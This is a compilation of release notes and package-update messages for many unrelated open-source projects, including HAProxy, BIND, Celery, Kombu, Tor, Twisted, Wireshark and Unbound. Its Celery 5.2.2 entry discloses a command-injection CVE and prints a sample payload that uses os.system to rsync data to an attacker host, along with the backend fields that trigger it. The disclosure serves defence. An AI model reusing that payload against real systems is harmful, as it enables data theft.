5.9.9
Improvements
Add loadbalancer timeout values
Add pricing date to slcli order preset-list
New Commands
slcli vlan create-options add new feature on vlan
slcli account bandwidth-pools Bandwidth pool features
It builds for me repeatedly with MAKE_JOBS=20.
(If there are failures and this needs reenabling, please open a
high-quality bug report upstream and provide a link.)
The next version will be 2.52.0, and this will interoperate with 2.51.
That is expected to continue indefinitely. There is no reason to have
multiple versions again, so say that the next update will move to the
unversioned name.
ocaml.mk defines MKPIE_SUPPORTED=no, but this was after bsd.prefs.mk
so _PKGSRC_MKPIE was already set to yes. This was made harder to
debug by options.mk including bsd.prefs.mk. Reorder to load ocaml.mk
earlier.
v11.27.0
Automated Spec Update
[Setup] Update deprecated description-file to use description_file
v11.26.0
Add scopes to documentation
Ensure Dropbox error is thrown in refresh access token
v3.3.1
Small fix to --attribute-comment in backend python client.
v3.3.0
Python
Add attrs export to python client
ApiRoute
ApiRoute: Provide a hash implementation, too.
Add sorting of ApiRoute, guaranteeing stable file output.
Objective C
Fix obj_c types to not overwrite jsonDict with nil
Synchronize access to route singletons
Added Bytes as a primitive that doesn't require serialization
Fix objc generation for Bytes property and for hash methods with switch statements
JavaScript/TypeScript
Fix wrap_error_in generation for TS client
Fix imports for TS autogenerated imports
Add ability to wrap errors in a custom error class for JS/TS
Add ability to dynamically import namespaces from types in the tsd client
Make extra parameters optional for JS/TS backends
2.5.3
- MINOR: sock: move the unused socket cleaning code into its own function
- BUG/MEDIUM: mworker: close unused transferred FDs on load failure
- BUG/MINOR: mworker: fix a FD leak of a sockpair upon a failed reload
- BUG/MINOR: sink: Use the right field in appctx context in release callback
- BUG/MEDIUM: resolvers: Really ignore trailing dot in domain names
- BUG/MEDIUM: fd: always align fdtab[] to 64 bytes
- BUG/MAJOR: compiler: relax alignment constraints on certain structures
- MINOR: httpclient: Don't limit data transfer to 1024 bytes
- BUG/MINOR: httpclient: reinit flags in httpclient_start()
- BUG/MINOR: mailers: negotiate SMTP, not ESMTP
- BUG/MINOR: ssl: Add missing return value check in ssl_ocsp_response_print
- BUG/MINOR: ssl: Fix leak in "show ssl ocsp-response" CLI command
- BUG/MINOR: ssl: Missing return value check in ssl_ocsp_response_print
- CLEANUP: httpclient/cli: fix indentation alignment of the help message
- BUG/MINOR: tools: url2sa reads ipv4 too far
- BUG/MEDIUM: httpclient: limit transfers to the maximum available room
- DEBUG: buffer: check in __b_put_blk() whether the buffer room is respected
2.5.2
- BUG/MEDIUM: connection: properly leave stopping list on error
- BUG/MEDIUM: htx: Adjust length to add DATA block in an empty HTX buffer
- BUG/MINOR: httpclient: don't send an empty body
- BUG/MINOR: httpclient: set default Accept and User-Agent headers
- BUG/MINOR: httpclient/lua: don't pop the lua stack when getting headers
- BUILD/MINOR: fix solaris build with clang.
- BUG/MEDIUM: server: avoid changing healthcheck ctx with set server ssl
- DOC: management: mark "set server ssl" as deprecated
- MEDIUM: cli: yield between each pipelined command
- MINOR: channel: add new function co_getdelim() to support multiple delimiters
- BUG/MINOR: cli: avoid O(bufsize) parsing cost on pipelined commands
- MEDIUM: h2/hpack: emit a Dynamic Table Size Update after settings change
- BUG/MEDIUM: cli: Never wait for more data on client shutdown
- BUG/MEDIUM: mcli: do not try to parse empty buffers
- BUG/MEDIUM: mcli: always realign wrapping buffers before parsing them
- BUG/MINOR: stream: make the call_rate only count the no-progress calls
- DEBUG: cli: add a new "debug dev fd" expert command
- BUILD: debug/cli: condition test of O_ASYNC to its existence
- DEBUG: pools: add new build option DEBUG_POOL_INTEGRITY
- REGTESTS: ssl: Fix ssl_errors regtest with OpenSSL 1.0.2
- BUG/MEDIUM: mworker: don't lose the stats socket on failed reload
- BUG/MINOR: mworker: does not add the -sf in wait mode
- BUG/MINOR: pools: always flush pools about to be destroyed
- DEBUG: pools: add extra sanity checks when picking objects from a local cache
- DEBUG: pools: let's add reverse mapping from cache heads to thread and pool
- DEBUG: pools: replace the link pointer with the caller's address on pool_free()
- BUG/MAJOR: sched: prevent rare concurrent wakeup of multi-threaded tasks
- BUG/MINOR: mworker: does not erase the pidfile upon reload
- DEBUG: fd: make sure we never try to insert/delete an impossible FD number
- MINOR: listener: replace the listener's spinlock with an rwlock
- BUG/MEDIUM: listener: read-lock the listener during accept()
- BUG/MINOR: httpclient: Revisit HC request and response buffers allocation
- BUG/MEDIUM: httpclient: Xfer the request when the stream is created
- BUG/MINOR: ssl: Remove empty lines from "show ssl ocsp-response <id>" output
- BUG/MINOR: jwt: Double free in deinit function
- BUG/MINOR: jwt: Missing pkey free during cleanup
- BUG/MINOR: jwt: Memory leak if same key is used in multiple jwt_verify calls
- BUG/MINOR: httpclient/cli: display junk characters in vsn
- BUG/MAJOR: http/htx: prevent unbounded loop in http_manage_server_side_cookies
- BUG/MAJOR: spoe: properly detach all agents when releasing the applet
- REGTESTS: server: close an occasional race on dynamic_server_ssl.vtc
- REGTESTS: peers: leave a bit more time to peers to synchronize
- BUG/MEDIUM: h2/hpack: fix emission of HPACK DTSU after settings change
- BUG/MINOR: mux-h2: update the session's idle delay before creating the stream
--- 9.16.26 released ---
5801. [bug] Log "quota reached" message when hard quota
is reached when accepting a connection. [GL #3125]
5800. [func] Add ECS support to the DLZ interface. [GL #3082]
5797. [bug] A failed view configuration during a named
reconfiguration procedure could cause inconsistencies
in BIND internal structures, causing a crash or other
unexpected errors. [GL #3060]
5795. [bug] rndc could crash when interrupted by a signal
before receiving a response. [GL #3080]
5793. [bug] Correctly detect and enable UDP recvmmsg support
in all versions of libuv that support it. [GL #3095]
This is an alpha for 2.52.0 and contains significant changes.
While just upgrading and using it should work, it has not received
enough testing to be called beta. In particular the new formats have
not been tested with big endian processors.
## Changes in 2.52.0
* Feature negotiation, compatible with 2.51.
* New archive format (independent of ocaml version, based on umarshal)
Upgrade is automatic.
* New wire protocol (independent of ocaml version, based on umarshal)
New protocol is used if both sides are >= 2.52.0.
* Support for unix-domain sockets
* Many bugfixes and minor improvements
* ocaml compatibility is now >= 4.01
* NEWS is now in NEWS.md and not in the manual
Release v1.44.0
Core
xDS: Rbac filter updates
Fix xDS client for multiple watchers.
bump C-core version for upcoming release.
Add a trace to list which filters are contained in a channel stack.
Remove grpc_httpcli_context.
xDS: Add support for RBAC HTTP filter.
API to cancel grpc_resolve_address.
Replace work serializer with a mutex in c-ares resolver.
xDS: Add graceful shutdown for old connections on listener resource update.
C++
Promote ClientContext::set_wait_for_ready to be non-experimental.
Python
Add python async example for hellostreamingworld using generator.
Disable __wrap_memcpy hack for Python builds.
Bump Bazel Python Cython dependency to 0.29.26.
Fix libatomic linking on Raspberry Pi OS Bullseye.
Allow generated proto sources in remote repositories for py_proto_library.
A patch fixing SunOS builds was lost during a recent update, restore
it. (And s/SmartOS/SunOS/ in comment, this doesn't just affect SmartOS,
reproduced and fixed on OmniOS. This package also fails to build on
Linux, but that's another issue entirely.) Addresses PR pkg/56716 from
Russell Hansen.
Changes not found. But note:
Important
Please note that from version 1.0.1 Flower uses Celery 5 and has
to be invoked in the same style as celery commands do.
The key takeaway here is that the Celery app's arguments have to
be specified after the celery command and Flower's arguments have
to be specified after the flower sub-command.
This is the template to follow:
celery [celery args] flower [flower args]
5.2.3
=====
- Allow redis >= 4.0.2.
- Upgrade minimum required pymongo version to 3.11.1.
- tested pypy3.8 beta (#6998).
- Split Signature.__or__ into subclasses' __or__ (#7135).
- Prevent duplication in event loop on Consumer restart.
- Restrict setuptools>=59.1.1,<59.7.0.
- Kombu bumped to v5.2.3
- py-amqp bumped to v5.0.9
- Some docs & CI improvements.
5.2.2
=====
- Various documentation fixes.
- Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
When a task fails, the failure information is serialized in the backend.
In some cases, the exception class is only importable from the
consumer's code base. In this case, we reconstruct the exception class
so that we can re-raise the error on the process which queried the
task's result. This was introduced in #4836.
If the recreated exception type isn't an exception, this is a security issue.
Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
``os.system("rsync /data attacker@192.168.56.100:~/data")``
by setting the task's result to a failure in the result backend with the os,
the system function as the exception type and the payload ``rsync /data attacker@192.168.56.100:~/data`` as the exception arguments like so:
.. code-block:: python
{
"exc_module": "os",
'exc_type': "system",
"exc_message": "rsync /data attacker@192.168.56.100:~/data"
}
According to my analysis, this vulnerability can only be exploited if
the producer delayed a task which runs long enough for the
attacker to change the result mid-flight, and the producer has
polled for the task's result.
The attacker would also have to gain access to the result backend.
The severity of this security vulnerability is low, but we still
recommend upgrading.
5.2.1
=====
- Fix rstrip usage on bytes instance in ProxyLogger.
- Pass logfile to ExecStop in celery.service example systemd file.
- fix: reduce latency of AsyncResult.get under gevent (#7052)
- Limit redis version: <4.0.0.
- Bump min kombu version to 5.2.2.
- Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
- Remove dependency to case (#7077).
- fix: task expiration is timezone aware if needed (#7065).
- Initial testing of pypy-3.8 beta to CI.
- Docs, CI & tests cleanups.
5.2.0
=====
- Prevent from subscribing to empty channels (#7040)
- fix register_task method.
- Fire task failure signal on final reject (#6980)
- Limit pymongo version: <3.12.1 (#7041)
- Bump min kombu version to 5.2.1
5.2.0rc2
========
- Bump Python 3.10.0 to rc2.
- [pre-commit.ci] pre-commit autoupdate (#6972).
- autopep8.
- Prevent worker to send expired revoked items upon hello command (#6975).
- docs: clarify the 'keeping results' section (#6979).
- Update deprecated task module removal in 5.0 documentation (#6981).
- [pre-commit.ci] pre-commit autoupdate.
- try python 3.10 GA.
- mention python 3.10 on readme.
- Documenting the default consumer_timeout value for rabbitmq >= 3.8.15.
- Azure blockblob backend parametrized connection/read timeouts (#6978).
- Add as_uri method to azure block blob backend.
- Add possibility to override backend implementation with celeryconfig (#6879).
- [pre-commit.ci] pre-commit autoupdate.
- try to fix deprecation warning.
- [pre-commit.ci] pre-commit autoupdate.
- not needed anyore.
- not needed anyore.
- not used anymore.
- add github discussions forum
5.2.0rc1
========
- Kill all workers when main process exits in prefork model (#6942).
- test kombu 5.2.0rc1 (#6947).
- try moto 2.2.x (#6948).
- Prepared Hacker News Post on Release Action.
- update setup with python 3.7 as minimum.
- update kombu on setupcfg.
- Added note about automatic killing all child processes of worker after its termination.
- [pre-commit.ci] pre-commit autoupdate.
- Move importskip before greenlet import (#6956).
- amqp: send expiration field to broker if requested by user (#6957).
- Single line drift warning.
- canvas: fix kwargs argument to prevent recursion (#6810) (#6959).
- Allow to enable Events with app.conf mechanism.
- Warn when expiration date is in the past.
- Add the Framework :: Celery trove classifier.
- Give indication whether the task is replacing another (#6916).
- Make setup.py executable.
- Bump version: 5.2.0b3 → 5.2.0rc1.
5.2.0b3
=======
- Add args to LOG_RECEIVED (fixes#6885) (#6898).
- Terminate job implementation for eventlet concurrency backend (#6917).
- Add cleanup implementation to filesystem backend (#6919).
- [pre-commit.ci] pre-commit autoupdate (#69).
- Add before_start hook (fixes#4110) (#6923).
- Restart consumer if connection drops (#6930).
- Remove outdated optimization documentation (#6933).
- added https verification check functionality in arangodb backend (#6800).
- Drop Python 3.6 support.
- update supported python versions on readme.
- [pre-commit.ci] pre-commit autoupdate (#6935).
- Remove appveyor configuration since we migrated to GA.
- pyugrade is now set to upgrade code to 3.7.
- Drop exclude statement since we no longer test with pypy-3.6.
- 3.10 is not GA so it's not supported yet.
- Celery 5.1 or earlier support Python 3.6.
- Fix linting error.
- fix: Pass a Context when chaining fail results (#6899).
- Bump version: 5.2.0b2 → 5.2.0b3.
5.2.0b2
=======
- Test windows on py3.10rc1 and pypy3.7 (#6868).
- Route chord_unlock task to the same queue as chord body (#6896).
- Add message properties to app.tasks.Context (#6818).
- handle already converted LogLevel and JSON (#6915).
- 5.2 is codenamed dawn-chorus.
- Bump version: 5.2.0b1 → 5.2.0b2.
5.2.0b1
=======
- Add Python 3.10 support (#6807).
- Fix docstring for Signal.send to match code (#6835).
- No blank line in log output (#6838).
- Chords get body_type independently to handle cases where body.type does not exist (#6847).
- Fix#6844 by allowing safe queries via app.inspect().active() (#6849).
- Fix multithreaded backend usage (#6851).
- Fix Open Collective donate button (#6848).
- Fix setting worker concurrency option after signal (#6853).
- Make ResultSet.on_ready promise hold a weakref to self (#6784).
- Update configuration.rst.
- Discard jobs on flush if synack isn't enabled (#6863).
- Bump click version to 8.0 (#6861).
- Amend IRC network link to Libera (#6837).
- Import celery lazily in pytest plugin and unignore flake8 F821, "undefined name '...'" (#6872).
- Fix inspect --json output to return valid json without --quiet.
- Remove celery.task references in modules, docs (#6869).
- The Consul backend must correctly associate requests and responses (#6823).
5.2.3
What's Changed
create codeql actions by @auvipy in #1441
create security policy doc by @auvipy in #1440
drop as we dont use travis by @auvipy in #1442
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1443
Fix PyPy CI jobs by @illia-v in #1446
Allow redis >= 4.0.2 by @illia-v in #1445
SQS transport: detect FIFO queue properly by checking queue URL by @n0061q in #1450
Ensure that restore is atomic in redis transport by @matusvalo in #1444
test pyaqp v5.0.7 by @auvipy in #1457
try restrict setuptool in CI by @auvipy in #1472
try pining setuptools by @auvipy in #1466
test amqp v5.0.9 by @auvipy in #1462
reduce memory usage of Transport by @pawl in #1470
prevent event loop polling on closed redis transports (and causing leak) by @pawl in #1476
respect connection timeout by @mehdipourfar in #1458
prevent redis event loop stopping on 'consumer: Cannot connect' by @pawl in #1477
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1478
5.2.2
What's Changed
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1430
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1436
pin redis under 4.0.0 for now by @auvipy in #1437
5.2.1
What's Changed
Added integration test of failed authentication to redis by @matusvalo in #1423
Bump redis version to >= 3.4.1 by @matusvalo in #1422
add python 3.10 to classifier by @auvipy in #1424
python !=3.12.1 by @auvipy in #1427
Update librabbitmq.txt by @auvipy in #1426
try latest sqs dependencies by @auvipy in #1428
5.2.0
What's Changed
Revert "Added redis transport key_prefix from envvars" by @matusvalo in #1249
Redis Transport: Small improvements of SentinelChannel by @matusvalo in #1253
Fix pidbox not using default channels on master by @lambacck in #1258
Added self to AUTHORS by @vinayinvicible in #1260
Revert "on worker restart - restore visible regardless to time (#905)" by @vinayinvicible in #1259
Add vine to install dependencies by @chrisburr in #1265
Reformat and improve kombu transport reference docs by @matusvalo in #1264
Pin urllib3<1.26 to fix failing unittests. by @matusvalo in #1273
Add timeout to producer publish by @RezaSi in #1269
Added 4.6.8 changelog by @KFoxder in #1276
Remove python2 compatibility code by @matusvalo in #1277
redis: Support Sentinel with SSL by @auvipy in #1275
Update connections.rst with Redis sentinel example by @anudeepsamaiya in #1285
docs: fix simple typo, propery -> property by @timgates42 in #1286
Support for Azure Service Bus 7.0.0 by @terrycain in #1284
Allow specifying session token by @flying-sheep in #1283
Fix Azure Service Bus URL parsing by @terrycain in #1287
Python 3 style print statement by @rednafi in #1289
min py-amqp to 5.0.5 by @auvipy in #1292
attempt to update to tox docker 2.0 by @auvipy in #1293
http/curl: missing _set_timeout by @raittes in #1296
Stop treating namedtuple as an object when using simplejson by @Hardtack in #1297
SQS back-off policy by @galCohen88 in #1301
SQS retry policy documentation improvement by @galCohen88 in #1304
Port of redis code improvements from prior revision by @matteius in #1132
Revert "Port of redis code improvements from prior revision" by @matusvalo in #1307
Fixed SQS unittests by @matusvalo in #1308
fix: non kombu json message decoding in SQS transport by @moaddib666 in #1306
Add Github Actions CI by @matusvalo in #1309
Update default pickle protocol version to 4 by @illia-v in #1314
Update connection.py by @Krogsager in #1311
Drop support for the lzma backport by @thedrow in #1317
Fix tiny mistake in introduction by @der-gabe in #1312
Drop obsolete code importing pickle by @illia-v in #1315
Small doc fixes by @der-gabe in #1319
Update default login method for librabbitmq and pyamqp by @daviskirk in #936
SQS Broker - handle STS authentication with AWS by @galCohen88 in #1322
min py-amqp to v5.0.6 by @auvipy in #1325
Use a thread-safe implementation of cached_property by @thedrow in #1316
Azure Service Bus - versatile queue names fix by @tsunday in #1324
Fix CI failure by @thedrow in #1327
Add support for SQLAlchemy 1.4 by @thedrow in #1328
Opencollective bot is now configured by @thedrow in #1331
re order CI jobs to make lint the last by @auvipy in #1332
Coerce seconds argument to a floating point number. by @thedrow in #1330
Make flake8 and pydocstyle happy by @matusvalo in #1333
Remove unused appveyor and travis configuration files by @matusvalo in #1335
Ignore kombu.transport.librabbitmq in apicheck. by @matusvalo in #1334
chore: Refactor code quality issues by @akshgpt7 in #1320
Revert "chore: Refactor code quality issues" by @matusvalo in #1342
add accept parameter to SimpleQueue class by @lsaavedr in #1140
prepare_accept_content() now raises SerializerNotInstalled instead of KeyError by @matusvalo in #1343
Remove backward compatible code not used anymore by @matusvalo in #1344
Move pytest.importorskip to run earlier by @felixonmars in #1346
Add support for setting redis username by @gabor-boros in #1351
enable pre-commit by @graingert in #1355
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1359
Add support for Python 3.9 by @D3X in #1363
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1364
Use hostname from URI when server_host is None by @matusvalo in #1366
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1367
Use Python's built-in json module by default, instead of simplejson by @nikolas in #1368
Fixed type comment by @SchizmOne in #1371
SQS Channel.predefined_queues should be {} if not defined by @infinitewarp in #1372
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1374
Add global key prefix for keys set by Redis transporter by @gabor-boros in #1349
fix: raise BrokenPipeError exit on brokenpipe instead of hanging around by @jagguli in #1231
[FAL-2030] fix: add missing commands to prefix by @gabor-boros in #1376
Make BrokerState Transport specific by @matusvalo in #1378
Run integration tests for kombu also with global_keyprefix by @matusvalo in #1380
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1379
v 1.4.x by @auvipy in #1338
stop mentioning librabbitmq by @auvipy in #1381
test new pytest version by @auvipy in #1383
drop python 3.6 from CI by @auvipy in #1382
Fix missing dependency to redis in docs requirements by @matusvalo in #1386
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1387
Remove dependency to case by @matusvalo in #1389
Fix: check redis response type by @kaiix in #1390
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1393
py3.7+ on setup by @auvipy in #1392
Prevent caching of oid in pidbox by @matusvalo in #1394
fix flake8 in kombu/asynchronous/aws/connection.py by @matusvalo in #1397
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1396
Fix test_pidbox unittests to support non-linux platforms by @matusvalo in #1398
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1400
removre bdist by @auvipy in #1406
add python 3.10 to CI & fix other issues by @auvipy in #1402
try to fix CI by @auvipy in #1407
Dont failfast when pypy3 tests fail by @matusvalo in #1408
Return empty list instead of InconsistencyError when exchange table is empty by @matusvalo in #1404
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1410
5.2.0 release notes by @naomielst in #1417
Changes in version 0.4.6.10 - 2022-02-04
This version contains minor bugfixes but one in particular is that relays
don't advertise onion service v2 support at the protocol version level.
o Minor features (fallbackdir):
- Regenerate fallback directories generated on February 04, 2022.
o Minor features (geoip data):
- Update the geoip files to match the IPFire Location Database, as
retrieved on 2022/02/04.
o Minor bugfix (logging):
- Update a log notice dead URL to a working one. Fixes bug 40544;
bugfix on 0.3.5.1-alpha.
o Minor bugfix (relay):
- Remove the HSDir and HSIntro onion service v2 protocol versions so
relay stop advertising that they support them. Fixes bug 40509;
bugfix on 0.3.5.17.
o Minor bugfixes (MetricsPort, Prometheus):
- Add double quotes to the label values of the onion service
metrics. Fixes bug 40552; bugfix on 0.4.5.1-alpha.
Twisted 22.1.0 (2022-02-03)
===========================
Features
--------
- Python 3.10 is now a supported platform
- Type annotations have been added to the twisted.python.fakepwd module.
Bugfixes
--------
- twisted.internet.defer.inlineCallbacks has an improved type annotation, to avoid typing errors when it is used on a function which returns a non-None result.
- ``twisted.internet.base.DelayedCall.__repr__`` and ``twisted.internet.task.LoopingCall.__repr__`` had the changes from 10155 reverted to accept non-function callables.
- Revert the removal of .whl building that was done as part of 10177.
- The type annotation of the host parameter to twisted.internet.interfaces.IReactorTCP.connectTCP has been corrected from bytes to str.
- Deprecated ``twisted.python.threading.ThreadPool.currentThread()`` in favor of ``threading.current_thread()``.
Switched ``twisted.python.threading.ThreadPool.currentThread()`` and ``twisted.python.threadable.getThreadID()`` to use `threading.current_thread()`` to avoid the deprecation warnings introduced for ``threading.currentThread()`` in Python 3.10.
Improved Documentation
----------------------
- twisted.internet.utils.runWithWarningsSupressed behavior of waiting on deferreds has been documented.
- Sync API docs templates with pydoctor 21.9.0 release, using new theming capabilities.
Bugfixes
--------
- SSHTransportBase.ssh_KEXINIT now uses the remote peer preferred MAC list for negotiation. In previous versions it was only using the local preferred MAC list.
Features
~~~~~~~~
- twisted.conch.ssh now supports SSH extension negotiation (RFC 8308).
Bugfixes
~~~~~~~~
- twisted.conch now uses constant-time comparisons for MACs.
- twisted.conch.ssh.filetransfer.FileTransferServer will now return an ENOENT error status if an SFTP client tries to close an unrecognized file handle.
- twisted.web.client.RedirectAgent and twisted.web.client.BrowserLikeRedirectAgent now properly remove sensitive headers when redirecting to a different origin.
Improved Documentation
----------------------
- Add type annotations for twisted.web.client.readBody.
Deprecations and Removals
~~~~~~~~~~~~~~~~~~~~~~~~~
- twisted.web.client.getPage, twisted.web.client.downladPage, and the associated implementation classes (HTTPPageGetter, HTTPPageDownloader, HTTPClientFactory, HTTPDownloader) have been removed because they do not segregate cookies by domain. They were deprecated in Twisted 16.7.0 in favor of twisted.web.client.Agent. GHSA-92x2-jw7w-xvvx.
Mail
----
No significant changes.
Words
-----
No significant changes.
Names
-----
No significant changes.
Trial
-----
Bugfixes
~~~~~~~~
- trial.runner.filenameToModule now sets the correct module.__name__ and sys.modules key
Twisted is a framework, written in Python, for writing networked applications.
It includes implementations of a number of commonly used network services such
as a web server, an IRC chat server, a mail server, a relational database
interface and an object broker. Developers can build applications using all of
these services as well as custom services that they write themselves. Twisted
also includes a user authentication system that controls access to services
and provides services with user context information to implement their own
security models.
Note that while this package provides most of Twisted, Twisted Conch
(SSH client/server) only functions if security/py-amkCrypto is also
installed.
This package contains the last version supporting Python 2.
5.0.18.3, released 2021-12-24
Compatibility with aeson-2.0
5.0.18.2, released 2021-09-01
Compatibility with extra-1.7.10
#370, add --jsonl to produce JSON on separate lines
Version 3.1.2.7
* No change from 3.1.2.6 but to take a right procedure to upload "network"
to Hackage for Windows.
Version 3.1.2.6
* Making IPv4PktInfo on Win the same as that on Posix #522
* Add support for nix/ghcjs #517
Version 3.1.2.5
* Regenerate configure script with autoconf-2.69 to temporarily fix broken
cabal-3.4.0.0 on Windows. Note that the old one was generated with
autoconf-2.71. #513
Version 3.1.2.3
* Supporting M1 Mac #510
* Workaround for autoconf on Windows #508
* Fixing building failure on SmartOS #507
* HsNet.h: remove unused fn hsnet_inet_ntoa definition #504
* Use a working define for OpenBSD detection #503
Version 3.1.2.2
* Allow bytestring 0.11 #490
* Export StructLinger #491
* Fix a couple of broken tests on OpenBSD #498
Wireshark 3.6.2 Release Notes
What’s New
Bug Fixes
The following vulnerabilities have been fixed:
• wnpa-sec-2022-01[1] RTMPT dissector infinite loop. Issue
17813[2].
• wnpa-sec-2022-02[3] Large loops in multiple dissectors. Issue
17829[4], Issue 17842[5], Issue 17847[6], Issue 17855[7], Issue
17891[8], Issue 17925[9], Issue 17926[10], Issue 17931[11], Issue
17932[12], Issue 17933[13].
• wnpa-sec-2022-03[14] PVFS dissector crash. Issue 17840[15].
• wnpa-sec-2022-04[16] CSN.1 dissector crash. Issue 17882[17].
• wnpa-sec-2022-05[18] CMS dissector crash. Issue 17935[19].
The following bugs have been fixed:
• Support for GSM SMS TPDU in HTTP2 body Issue 17784[20].
• Wireshark 3.6.1 broke the ABI by removing ws_log_default_writer
from libwsutil Issue 17822[21].
• Fedora RPM package build failing with RPATH of /usr/local/lib64
Issue 17830[22].
• macos-setup.sh: ftp.pcre.org no longer exists Issue 17834[23].
• nmap.org/npcap → npcap.com: domain/URL change Issue 17838[24].
• MPLS ECHO FEC stack change TLV not dissected correctly Issue
17868[25].
• Attempting to open a systemd journal export file segfaults Issue
17875[26].
• Dissector bug on 802.11ac packets Issue 17878[27].
• The Info column shows only one NGAP/S1AP packet of several
packets inside an SCTP packet Issue 17886[28].
• Uninstalling Wireshark 3.6.1 on Windows 10 fails to remove the
installation directory because it doesn’t remove the User’s Guide
subdirectory and all its contents. Issue 17898[29].
• 3.6 doesn’t build without zlib Issue 17899[30].
• SIP Statistics no longer properly reporting method type
accounting Issue 17904[31].
• Fuzz job crash output: fuzz-2022-01-26-6940.pcap Issue 17909[32].
• SCTP retransmission detection broken for the first data chunk of
each association with relative TSN Issue 17917[33].
• “Show In Folder” doesn’t work correctly for filenames with spaces
Issue 17927[34].
New and Updated Features
New Protocol Support
There are no new protocols in this release.
Updated Protocol Support
AMP, ASN.1 PER, ATN-ULCS, BGP, BP, CFLOW, CMS, CSN.1, GDSDB, GSM RP,
GTP, HTTP3, IEEE 802.11 Radiotap, IPDC, ISAKMP, Kafka, MP2T, MPEG
PES, MPEG SECT, MPLS ECHO, NGAP, NTLMSSP, OpenFlow 1.4, OpenFlow 1.5,
P_MUL, PN-RT, PROXY, PTP, PVFS, RSL, RTMPT, rtnetlink, S1AP, SCTP,
Signal PDU, SIP, TDS, USB, WAP, and ZigBee ZCL
New and Updated Capture File Support
BLF and libpcap
New File Format Decoding Support
There is no new or updated file format support in this release.
v1.17.0
This is a long overdue release!
Added:
Update records
Delete records
Support for Projects in Manager
Loadbalancer missing properties
Changed:
Updated Loadbalancer docs
* [youtube:search] Fix extractor by
[coletdjnz](https://github.com/coletdjnz)
* [youtube:search] Add tests
* [twitcasting] Enforce UTF-8 for POST payload by
[Lesmiscore](https://github.com/Lesmiscore)
* [mediaset] Fix extractor by
[nixxo](https://github.com/nixxo)
* [websocket] Make syntax error in `websockets` module non-fatal
Pkgsrc changes:
* none, other than checksums.
Upstream changes:
This release has bug fixes for crashes that happened on heavy network
usage. The default for the aggressive-nsec option has changed, it is now
enabled.
The ratelimit logic had to be reworked for the crash fixes. As a result,
there are new options to control the behaviour of ratelimiting.
The ratelimit-backoff and ip-ratelimit-backoff options can be used to
control how severe the backoff is when the ratelimit is exceeded.
The rpz-signal-nxdomain-ra option can be used to unset the RA flag, for
NXDOMAIN answers from RPZ. That is used by some clients to detect that
the domain is externally blocked. The RPZ option for-downstream can be
used like for auth zones, this allows the RPZ zone information to be
queried. That can be useful for monitoring scripts.
Features
- Fix#596: unset the RA bit when a query is blocked by an unbound
RPZ nxdomain reply. The option rpz-signal-nxdomain-ra allows to
signal that a domain is externally blocked to clients when it
is blocked with NXDOMAIN by unsetting RA.
- Add rpz: for-downstream: yesno option, where the RPZ zone is
authoritatively answered for, so the RPZ zone contents can be
checked with DNS queries directed at the RPZ zone.
- Merge PR #616: Update ratelimit logic. It also introduces
ratelimit-backoff and ip-ratelimit-backoff configuration options.
- Change aggressive-nsec default to yes.
Bug Fixes
- Fix compile warning for if_nametoindex on windows 64bit.
- Merge PR #581 from fobser: Fix -Wmissing-prototypes and -Wshadow
warnings in rpz.
- Fix validator debug output about DS support, print correct algorithm.
- Add code similar to fix for ldns for tab between strings, for
consistency, the test case was not broken.
- Allow local-data for classes other than IN to inherit a configured
local-zone's type if possible, instead of defaulting to type
transparent as per the implicit rule.
- Fix to pick up other class local zone information before unlock.
- Add missing configure flags for optional features in the
documentation.
- Fix Unbound capitalization in the documentation.
- Fix#591: Unbound-anchor manpage links to non-existent license file.
- contrib/aaaa-filter-iterator.patch file renewed diff content to
apply cleanly to the current coderepo for the current code version.
- Fix to add test for rpz-signal-nxdomain-ra.
- Fix#596: only unset RA when NXDOMAIN is signalled.
- Fix that RPZ does not set RD flag on replies, it should be copied
from the query.
- Fix for #596: fix that rpz return message is returned and not just
the rcode from the iterator return path. This fixes signal unset RA
after a CNAME.
- Fix unit tests for rpz now that the AA flag returns successfully from
the iterator loop.
- Fix for #596: add unit test for nsdname trigger and signal unset RA.
- Fix for #596: add unit test for nsip trigger and signal unset RA.
- Fix#598: Fix unbound-checkconf fatal error: module conf
'respip dns64 validator iterator' is not known to work.
- Fix for #596: Fix rpz-signal-nxdomain-ra to work for clientip
triggered operation.
- Merge #600 from pemensik: Change file mode before changing file
owner.
- Fix prematurely terminated TCP queries when a reply has the same ID.
- For #602: Allow the module-config "subnetcache validator cachedb
iterator".
- Fix EDNS to upstream where the same option could be attached
more than once.
- Add a region to serviced_query for allocations.
- For dnstap, do not wakeupnow right there. Instead zero the timer to
force the wakeup callback asap.
- Fix#610: Undefine-shift in sldns_str2wire_hip_buf.
- Fix#588: Unbound 1.13.2 crashes due to p->pc is NULL in
serviced_udp_callback.
- Merge PR #612: TCP race condition.
- Test for NSID in SERVFAIL response due to DNSSEC bogus.
- Fix#599: [FR] RFC 9156 (obsoletes RFC 7816), by noting the new RFC
document.
- Fix tls-* and ssl-* documented alternate syntax to also be available
through remote-control and unbound-checkconf.
- Better cleanup on failed DoT/DoH listening socket creation.
- iana portlist update.
- Fix review comment for use-after-free when failing to send UDP out.
- Merge PR #603 from fobser: Use OpenSSL 1.1 API to access DSA and RSA
internals.
- Merge PR #532 from Shchelk: Fix: buffer overflow bug.
- Merge PR #617: Update stub/forward-host notation to accept port and
tls-auth-name.
- Update stream_ssl.tdir test to also use the new forward-host
notation.
- Fix header comment for doxygen for authextstrtoaddr.
- please clang analyzer for loop in test code.
- Fix docker splint test to use more portable uname.
- Update contrib/aaaa-filter-iterator.patch with diff for current
software version.
- Fix for #611: Integer overflow in sldns_wire2str_pkt_scan.
